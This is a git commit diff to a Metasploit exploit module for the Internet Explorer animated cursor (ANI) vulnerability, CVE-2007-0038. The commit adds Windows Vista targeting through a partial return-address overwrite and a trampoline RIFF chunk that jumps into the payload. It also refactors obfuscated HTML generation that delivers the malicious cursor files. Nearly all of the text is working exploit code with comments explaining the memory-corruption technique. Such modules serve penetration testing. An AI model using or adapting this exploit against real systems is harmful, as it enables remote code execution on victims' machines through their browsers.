fixes for Vista, brute forcing

git-svn-id: file:///home/svn/framework3/trunk@4598 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Matt Miller 2007-04-01 20:33:35 +00:00
parent 86f4bfd514
commit 6cfab21bcb
1 changed files with 48 additions and 37 deletions

View File

@ -96,18 +96,20 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
# #
# Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start # Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start
# of the RIFF itself. # of the RIFF chunk itself. The length field of the RIFF chunk
# tag contains a short jump into an embedded riff chunk that
# makes a long relative jump into the actual payload.
# #
[ 'Windows Vista user32.dll 6.0.6000.16386',
{
'Ret' => 0x700b,
'Len' => 2,
# The RIFF magic bytes and the size of the riff file are # On Vista, the pages that contain the RIFF are read-only.
# executed which then bounce through. # In-place decoders cannot be used.
# 'EncoderType' => Msf::Encoder::Type::Raw
# 1. Partial overwrite return with the address of a jmp dword [ebx] }
# 2. Executes the first few bytes of the RIFF chunk and then ]
# does a jmp $+0x16
# 3. Executes a relative jump to the start of the payload
# itself.
[ 'Windows Vista user32.dll 6.0.6000.16386', { 'Ret' => 0x700b, 'Len' => 2 } ]
], ],
'DisclosureDate' => 'Mar 28 2007', 'DisclosureDate' => 'Mar 28 2007',
@ -145,28 +147,14 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
mytargs = (target.name =~ /All Targets/) ? targets : [target] mytargs = (target.name =~ /All Targets/) ? targets : [target]
mytargs.each_index do |i| if target.name =~ /All Targets/
targets.each_index { |i|
next if not targets[i].ret
next if not mytargs[i].ret html << generate_div(gext, i)
}
html << "<div style='" + else
generate_css_padding() + html << generate_div(gext, target_index)
Rex::Text.to_rand_case("cursor") +
generate_css_padding() +
":" +
generate_css_padding() +
Rex::Text.to_rand_case("url(") +
generate_css_padding() +
'"' +
get_resource + '/' + rand_text_alphanumeric(rand(80)+16) + ".#{gext}" +
"?#{rand_text_alpha(rand(12)+1)}=#{i}" +
'"' +
generate_css_padding() +
");" +
generate_css_padding() +
"'>" +
generate_padding() +
"</div>"
end end
html << "</body></html>" html << "</body></html>"
@ -191,6 +179,27 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
handler(cli) handler(cli)
end end
def generate_div(gext, targ)
"<div style='" +
generate_css_padding() +
Rex::Text.to_rand_case("cursor") +
generate_css_padding() +
":" +
generate_css_padding() +
Rex::Text.to_rand_case("url(") +
generate_css_padding() +
'"' +
get_resource + '/' + rand_text_alphanumeric(rand(80)+16) + ".#{gext}" +
"?#{rand_text_alpha(rand(12)+1)}=#{targ}" +
'"' +
generate_css_padding() +
");" +
generate_css_padding() +
"'>" +
generate_padding() +
"</div>"
end
def generate_ani(payload, target) def generate_ani(payload, target)
# Build the first ANI header # Build the first ANI header
@ -208,10 +217,10 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
if (target.name =~ /Vista/) if (target.name =~ /Vista/)
# Vista has ebp=80, eip=84 # Vista has ebp=80, eip=84
anih_b = anih_a + rand_text(84-anih_a.length) anih_b = rand_text(84)
# Overwrite locals with invalid pointers # Overwrite local counter variable and pointers
anih_b[68, 12] = [0x80000000 | rand(0xffffffff)].pack('V') * 3 anih_b[68, 12] = [0].pack('V') * 3
else else
# XP/2K has ebp=76 and eip=80 # XP/2K has ebp=76 and eip=80
anih_b = anih_a + rand_text(80-anih_a.length) anih_b = anih_a + rand_text(80-anih_a.length)
@ -226,6 +235,8 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
# Begin the ANI chunk # Begin the ANI chunk
riff = "ACON" riff = "ACON"
# Calculate the data offset for the trampoline chunk and add
# the trampoline chunk if we're attacking Vista
if target.name =~ /Vista/ if target.name =~ /Vista/
trampoline_doffset = riff.length + 8 trampoline_doffset = riff.length + 8